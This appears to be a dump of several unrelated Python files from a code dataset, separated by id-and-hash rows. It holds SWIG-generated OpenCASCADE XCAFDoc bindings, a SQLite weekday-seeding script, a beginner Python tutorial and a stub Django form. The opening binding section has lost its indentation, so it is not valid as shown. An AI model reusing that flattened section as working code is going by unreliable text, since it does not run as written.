def SetSHUO(self, *args):
"""
* Sets the SHUO structure between upper_usage and next_usage create multy-level (if number of labels > 2) SHUO from first to last Initialise out <MainSHUOAttr> by main upper_usage SHUO attribute. Returns False if some of labels in not component label
:param Labels:
:type Labels: TDF_LabelSequence &
:param MainSHUOAttr:
:type MainSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetSHUO(self, *args)
def GetSHUO(*args):
"""
* Returns founded SHUO GraphNode attribute <aSHUOAttr> Returns false in other case
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:param aSHUOAttr:
:type aSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUO(*args)
GetSHUO = staticmethod(GetSHUO)
def GetAllComponentSHUO(*args):
"""
* Returns founded SHUO GraphNodes of indicated component Returns false in other case
:param CompLabel:
:type CompLabel: TDF_Label &
:param SHUOAttrs:
:type SHUOAttrs: TDF_AttributeSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllComponentSHUO(*args)
GetAllComponentSHUO = staticmethod(GetAllComponentSHUO)
def GetSHUOUpperUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is upper_usage for this next_usage SHUO attribute (that indicated by label) NOTE: returns upper_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param NextUsageL:
:type NextUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args)
GetSHUOUpperUsage = staticmethod(GetSHUOUpperUsage)
def GetSHUONextUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is next_usage for this upper_usage SHUO attribute (that indicated by label) NOTE: returns next_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param UpperUsageL:
:type UpperUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUONextUsage(*args)
GetSHUONextUsage = staticmethod(GetSHUONextUsage)
def RemoveSHUO(self, *args):
"""
* Remove SHUO from component sublabel, remove all dependencies on other SHUO. Returns False if cannot remove SHUO dependencies. NOTE: remove any styles that associated with this SHUO.
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveSHUO(self, *args)
def FindComponent(self, *args):
"""
* Serach the path of labels in the document, that corresponds the component from any assembly Try to search the sequence of labels with location that produce this shape as component of any assembly NOTE: Clear sequence of labels before filling
:param theShape:
:type theShape: TopoDS_Shape &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindComponent(self, *args)
def GetSHUOInstance(self, *args):
"""
* Search for the component shape that styled by shuo Returns null shape if no any shape is found.
:param theSHUO:
:type theSHUO: Handle_XCAFDoc_GraphNode &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOInstance(self, *args)
def SetInstanceSHUO(self, *args):
"""
* Search for the component shape by labelks path and set SHUO structure for founded label structure Returns null attribute if no component in any assembly found.
:param theShape:
:type theShape: TopoDS_Shape &
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetInstanceSHUO(self, *args)
def GetAllSHUOInstances(self, *args):
"""
* Seaching for component shapes that styled by shuo Returns empty sequence of shape if no any shape is found.
:param theSHUO:
:type theSHUO: Handle_XCAFDoc_GraphNode &
:param theSHUOShapeSeq:
:type theSHUOShapeSeq: TopTools_SequenceOfShape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllSHUOInstances(self, *args)
def FindSHUO(*args):
"""
* Searchs the SHUO by labels of components from upper_usage componet to next_usage Returns null attribute if no SHUO found
:param Labels:
:type Labels: TDF_LabelSequence &
:param theSHUOAttr:
:type theSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSHUO(*args)
FindSHUO = staticmethod(FindSHUO)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_ShapeTool self)"""
return _XCAFDoc.XCAFDoc_ShapeTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_ShapeTool self) -> Handle_XCAFDoc_ShapeTool"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
# SWIG boilerplate: bind the C-level implementations onto the XCAFDoc_ShapeTool
# proxy class, then register the class with the SWIG runtime. Machine-generated;
# do not edit by hand.
XCAFDoc_ShapeTool.IsTopLevel = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_IsTopLevel,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.IsSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_IsSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SearchUsingMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SearchUsingMap,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Search = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Search,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.NewShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_NewShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Init = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Init,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.ComputeShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_ComputeShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.ComputeSimpleShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_ComputeSimpleShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetFreeShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetFreeShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.UpdateAssembly = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_UpdateAssembly,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindMainShapeUsingMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindMainShapeUsingMap,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindMainShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindMainShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_BaseLabel,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Dump = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Dump,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetExternRefs = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetExternRefs,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetSHUOInstance = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetSHUOInstance,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetInstanceSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetInstanceSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetAllSHUOInstances = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetAllSHUOInstances,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool__kill_pointed,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetHandle,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool_swigregister = _XCAFDoc.XCAFDoc_ShapeTool_swigregister
XCAFDoc_ShapeTool_swigregister(XCAFDoc_ShapeTool)
def XCAFDoc_ShapeTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetID(*args)
def XCAFDoc_ShapeTool_Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Set(*args)
def XCAFDoc_ShapeTool_IsFree(*args):
"""
* Returns True if the label is not used by any assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True (There is no Father TreeNode on this <L>)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsFree(*args)
def XCAFDoc_ShapeTool_IsShape(*args):
"""
* Returns True if the label represents a shape (simple shape, assembly or reference)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsShape(*args)
def XCAFDoc_ShapeTool_IsSimpleShape(*args):
"""
* Returns True if the label is a label of simple shape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSimpleShape(*args)
def XCAFDoc_ShapeTool_IsReference(*args):
"""
* Return true if <L> is a located instance of other shape i.e. reference
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsReference(*args)
def XCAFDoc_ShapeTool_IsAssembly(*args):
"""
* Returns True if the label is a label of assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsAssembly(*args)
def XCAFDoc_ShapeTool_IsComponent(*args):
"""
* Return true if <L> is reference serving as component of assembly
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsComponent(*args)
def XCAFDoc_ShapeTool_IsCompound(*args):
"""
* Returns True if the label is a label of compound, i.e. contains some sublabels This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsCompound(*args)
def XCAFDoc_ShapeTool_GetShape(*args):
"""
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns False if label does not contain shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: bool
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns Null shape if label does not contain shape
:param L:
:type L: TDF_Label &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShape(*args)
def XCAFDoc_ShapeTool_SetAutoNaming(*args):
"""
* Sets auto-naming mode to <V>. If True then for added shapes, links, assemblies and SHUO's, the TDataStd_Name attribute is automatically added. For shapes it contains a shape type (e.g. 'SOLID', 'SHELL', etc); for links it has a form '=>[0:1:1:2]' (where a tag is a label containing a shape without a location); for assemblies it is 'ASSEMBLY', and 'SHUO' for SHUO's. This setting is global; it cannot be made a member function as it is used by static methods as well. By default, auto-naming is enabled. See also AutoNaming().
:param V:
:type V: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetAutoNaming(*args)
def XCAFDoc_ShapeTool_AutoNaming(*args):
"""
* Returns current auto-naming mode. See SetAutoNaming() for description.
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AutoNaming(*args)
def XCAFDoc_ShapeTool_GetUsers(*args):
"""
* Returns list of labels which refer shape L as component Returns number of users (0 if shape is free)
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetUsers(*args)
def XCAFDoc_ShapeTool_GetLocation(*args):
"""
* Returns location of instance
:param L:
:type L: TDF_Label &
:rtype: TopLoc_Location
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetLocation(*args)
def XCAFDoc_ShapeTool_GetReferredShape(*args):
"""
* Returns label which corresponds to a shape referred by L Returns False if label is not reference
:param L:
:type L: TDF_Label &
:param Label:
:type Label: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetReferredShape(*args)
def XCAFDoc_ShapeTool_NbComponents(*args):
"""
* Returns number of Assembles components
:param L:
:type L: TDF_Label &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NbComponents(*args)
def XCAFDoc_ShapeTool_GetComponents(*args):
"""
* Returns list of components of assembly Returns False if label is not assembly
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetComponents(*args)
def XCAFDoc_ShapeTool_GetSubShapes(*args):
"""
* Returns list of labels identifying subshapes of the given shape Returns False if no subshapes are placed on that label
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSubShapes(*args)
def XCAFDoc_ShapeTool_DumpShape(*args):
"""
* Print in cout type of shape found on <L> label and the entry of <L>, with <level> tabs before. If <deep>, print also TShape and Location addresses
:param L:
:type L: TDF_Label &
:param level: default value is 0
:type level: int
:param deep: default value is Standard_False
:type deep: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_DumpShape(*args)
def XCAFDoc_ShapeTool_IsExternRef(*args):
"""
* Returns True if the label is a label of external references, i.e. there are some reference on the no-step files, which are described in document only their names
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsExternRef(*args)
def XCAFDoc_ShapeTool_GetExternRefs(*args):
"""
* Gets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)
def XCAFDoc_ShapeTool_GetSHUO(*args):
"""
* Returns founded SHUO GraphNode attribute <aSHUOAttr> Returns false in other case
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:param aSHUOAttr:
:type aSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUO(*args)
def XCAFDoc_ShapeTool_GetAllComponentSHUO(*args):
"""
* Returns founded SHUO GraphNodes of indicated component Returns false in other case
:param CompLabel:
:type CompLabel: TDF_Label &
:param SHUOAttrs:
:type SHUOAttrs: TDF_AttributeSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllComponentSHUO(*args)
def XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is upper_usage for this next_usage SHUO attribute (that indicated by label) NOTE: returns upper_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param NextUsageL:
:type NextUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args)
def XCAFDoc_ShapeTool_GetSHUONextUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is next_usage for this upper_usage SHUO attribute (that indicated by label) NOTE: returns next_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param UpperUsageL:
:type UpperUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUONextUsage(*args)
def XCAFDoc_ShapeTool_FindSHUO(*args):
"""
* Searchs the SHUO by labels of components from upper_usage componet to next_usage Returns null attribute if no SHUO found
:param Labels:
:type Labels: TDF_LabelSequence &
:param theSHUOAttr:
:type theSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSHUO(*args)
class Handle_XCAFDoc_ShapeTool(OCC.TDF.Handle_TDF_Attribute):
    """SWIG smart-pointer (OCCT handle) proxy for XCAFDoc_ShapeTool."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr

    def __init__(self, *args):
        """Construct a handle, optionally wrapping an existing XCAFDoc_ShapeTool."""
        _XCAFDoc.Handle_XCAFDoc_ShapeTool_swiginit(self, _XCAFDoc.new_Handle_XCAFDoc_ShapeTool(*args))

    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast)

    def __del__(self):
        # Deliberate bare except (SWIG pattern): __del__ can run during
        # interpreter shutdown when module globals are already gone.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass

# SWIG boilerplate: bind C-level methods and register the proxy class.
Handle_XCAFDoc_ShapeTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_Nullify, None, Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_IsNull, None, Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_GetObject, None, Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool__kill_pointed, None, Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ShapeTool_swigregister
Handle_XCAFDoc_ShapeTool_swigregister(Handle_XCAFDoc_ShapeTool)

def Handle_XCAFDoc_ShapeTool_DownCast(*args):
    """Down-cast a base attribute handle to Handle_XCAFDoc_ShapeTool."""
    return _XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast(*args)
Handle_XCAFDoc_ShapeTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast
class XCAFDoc_Volume(OCC.TDF.TDF_Attribute):
    """SWIG proxy for the OCAF attribute storing a volume value on a TDF label."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr

    def __init__(self, *args):
        """
        * class methods =============
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Volume_swiginit(self, _XCAFDoc.new_XCAFDoc_Volume(*args))

    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Volume_GetID(*args)
    GetID = staticmethod(GetID)

    def Set(*args):
        """
        * Sets a value of volume
        :param vol:
        :type vol: float
        :rtype: None
        * Find, or create, a Volume attribute and set its value
        :param label:
        :type label: TDF_Label &
        :param vol:
        :type vol: float
        :rtype: Handle_XCAFDoc_Volume
        """
        return _XCAFDoc.XCAFDoc_Volume_Set(*args)
    Set = staticmethod(Set)

    def Get(*args):
        """
        :rtype: float
        * Returns volume as argument; returns false if no such attribute at the <label>
        :param label:
        :type label: TDF_Label &
        :param vol:
        :type vol: float &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_Volume_Get(*args)
    Get = staticmethod(Get)

    def DumpToString(self):
        """DumpToString(XCAFDoc_Volume self) -> std::string"""
        return _XCAFDoc.XCAFDoc_Volume_DumpToString(self)

    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Volume self)"""
        return _XCAFDoc.XCAFDoc_Volume__kill_pointed(self)

    def GetHandle(self):
        """GetHandle(XCAFDoc_Volume self) -> Handle_XCAFDoc_Volume"""
        return _XCAFDoc.XCAFDoc_Volume_GetHandle(self)

    def __del__(self):
        # Deliberate bare except (SWIG pattern): __del__ can run during
        # interpreter shutdown when module globals are already gone.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass

# SWIG boilerplate: bind C-level instance methods and register the proxy class.
XCAFDoc_Volume.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Volume_DumpToString, None, XCAFDoc_Volume)
XCAFDoc_Volume._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Volume__kill_pointed, None, XCAFDoc_Volume)
XCAFDoc_Volume.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Volume_GetHandle, None, XCAFDoc_Volume)
XCAFDoc_Volume_swigregister = _XCAFDoc.XCAFDoc_Volume_swigregister
XCAFDoc_Volume_swigregister(XCAFDoc_Volume)
def XCAFDoc_Volume_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_Volume_GetID(*args)

def XCAFDoc_Volume_Set(*args):
    """
    * Sets a value of volume
    :param vol:
    :type vol: float
    :rtype: None
    * Find, or create, a Volume attribute and set its value
    :param label:
    :type label: TDF_Label &
    :param vol:
    :type vol: float
    :rtype: Handle_XCAFDoc_Volume
    """
    return _XCAFDoc.XCAFDoc_Volume_Set(*args)

def XCAFDoc_Volume_Get(*args):
    """
    :rtype: float
    * Returns volume as argument; returns false if no such attribute at the <label>
    :param label:
    :type label: TDF_Label &
    :param vol:
    :type vol: float &
    :rtype: bool
    """
    return _XCAFDoc.XCAFDoc_Volume_Get(*args)
class Handle_XCAFDoc_Volume(OCC.TDF.Handle_TDF_Attribute):
    """SWIG smart-pointer (OCCT handle) proxy for XCAFDoc_Volume."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr

    def __init__(self, *args):
        """Construct a handle, optionally wrapping an existing XCAFDoc_Volume."""
        _XCAFDoc.Handle_XCAFDoc_Volume_swiginit(self, _XCAFDoc.new_Handle_XCAFDoc_Volume(*args))

    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Volume_DownCast)

    def __del__(self):
        # Deliberate bare except (SWIG pattern): __del__ can run during
        # interpreter shutdown when module globals are already gone.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass

# SWIG boilerplate: bind C-level methods and register the proxy class.
Handle_XCAFDoc_Volume.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_Nullify, None, Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_IsNull, None, Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_GetObject, None, Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume__kill_pointed, None, Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume_swigregister = _XCAFDoc.Handle_XCAFDoc_Volume_swigregister
Handle_XCAFDoc_Volume_swigregister(Handle_XCAFDoc_Volume)

def Handle_XCAFDoc_Volume_DownCast(*args):
    """Down-cast a base attribute handle to Handle_XCAFDoc_Volume."""
    return _XCAFDoc.Handle_XCAFDoc_Volume_DownCast(*args)
Handle_XCAFDoc_Volume_DownCast = _XCAFDoc.Handle_XCAFDoc_Volume_DownCast
|
23,529 | fbde2a7eacab32577227b831f400bb25ae9ac93c | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 27 15:05:40 2019
@author: lenovo
"""
from sql.connect import DBConnection
# Weekday lookup data: ids 1-7 (Sunday-first), kanji characters, English names.
day_id = [1, 2, 3, 4, 5, 6, 7]
day_kanji = ['日', '月', '火', '水', '木', '金', '土']
day_english = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']

db = DBConnection()
conn = db.connection()
c = conn.cursor()

# Kept for reference: one-off category seeding previously run from this script.
# for cat_id, cat_name in zip(morning_cat_id, morning_categories):
#     c.execute("insert into categories (category_id, category_name, version) values(?, ?, ?)",
#               (cat_id, cat_name, 'M'))
# conn.commit()
# conn.close()

# Seed the days table as a single batch and commit once instead of
# executing and committing row-by-row with index arithmetic.
c.executemany(
    "insert into days (day_id, day_kanji, day_english) values(?, ?, ?)",
    zip(day_id, day_kanji, day_english),
)
conn.commit()
conn.close()
23,530 | 8c84eac903cbbf9837fcf0c74e906a94f1cd61a9 | sum = 2 + 2
# Tutorial walkthrough of Python's core containers; each section prints
# intermediate state so the evolution of the objects is visible.
print(sum)

# --- Lists ---
my_list = ["renee", "leo", "clive", False, 41]
my_list.count("renee")   # return value discarded; demo only
my_list.count(41)
my_list.append("tucker")
print(my_list)
my_list.count(41)
my_list.pop(2)           # removes "clive"
my_list.reverse()
print(my_list)
my_list.insert(1, 58)
print(my_list)
print(my_list)
my_list.insert(2, 58)
print(my_list)
my_new_list = list(["what"])
my_new_list = list("what")   # overwrites with ['w', 'h', 'a', 't']
print(my_list)

# --- Dictionaries ---
my_pairs = {
    "name": "Fred",
    "age": 46
}
print(my_pairs)
name = my_pairs["name"]
print(name)
my_pairs["last"] = "Jones"
print("Line 35", my_pairs)
my_pairs["address"] = {"street": "123 Sesame Street", "zip": 40503}
print("Line 37", my_pairs)
print("Line 38", my_pairs["address"]["zip"])
print("Line 39 items", my_pairs.items())
print("Line 40 values", my_pairs.values())
for foo in my_pairs.values():
    print("Line 43", foo)
for foo in my_pairs.items():
    print("Line 46", foo)
for key, value in my_pairs.items():
    print(f"This came from my_pairs: {value}")
print(f'Hello, my name is {my_pairs["name"]}')

# --- Sets ---
my_set = {"fred", 3, 12, True, "Jones", 3}
print("Line 56 set", my_set)
my_dupes = [1, 2, 3, 4, 5, 1]
my_dupes = set(my_dupes)     # de-duplicates
print("Line 60", list(my_dupes))
my_set.add("hello C33")
print("Line 63", my_set)
print("Line 64", set(my_pairs))
# --- Tuples ---
my_tup = ("1", 1, 3, "hello", True, 3)
print("Line 69", my_tup)
my_tup.count(3)
print(my_tup.count(3))
print(my_tup.index("hello"))
# --- Conditionals ---
name = "Steve"
if name == "Steve":
    print("I feel good")
elif name == "Joe":
    print("Joe is the king of the world")
else:
    print("I have a cold")
# Multiplier -> ordered suffix names for decimal (SI) and binary units.
SUFFIXES = {1000: ['KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'],
            1024: ['KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']}


def approximate_size(size, a_kilobyte_is_1024_bytes=True):
    '''Convert a file size to human-readable form.

    Keyword arguments:
    size -- file size in bytes
    a_kilobyte_is_1024_bytes -- if True (default), use multiples of 1024
                                if False, use multiples of 1000

    Returns: string

    Raises: ValueError if size is negative or too large for the suffix table.
    '''
    if size < 0:
        raise ValueError('number must be non-negative')

    multiple = 1024 if a_kilobyte_is_1024_bytes else 1000
    for suffix in SUFFIXES[multiple]:
        size /= multiple   # float division: keeps a fractional value for formatting
        if size < multiple:
            return '{0:.1f} {1}'.format(size, suffix)

    raise ValueError('number too large')
if __name__ == '__main__':
    print("Line 114", approximate_size(16384, False))
    print("Line 115", approximate_size(size=16384, a_kilobyte_is_1024_bytes=False))
    # approximate_size(-16384) raises ValueError; catch it so the demo
    # finishes instead of crashing on its last line.
    try:
        print("Line 116", approximate_size(-16384))
    except ValueError as err:
        print("Line 116", "ValueError:", err)
|
23,531 | 77f27b90f388b0de6ce5b930510c69c7ab485ee2 | from django import forms
from .models import UserRegistration
class UserRegistrationForm(forms.ModelForm):
    """ModelForm exposing every field of the UserRegistration model."""

    class Meta:
        model = UserRegistration
        # NOTE(review): '__all__' exposes every model field, including any
        # sensitive ones added later; an explicit field list is safer.
        fields = '__all__'
class LoginForm(forms.Form):
    """Plain username/password login form."""

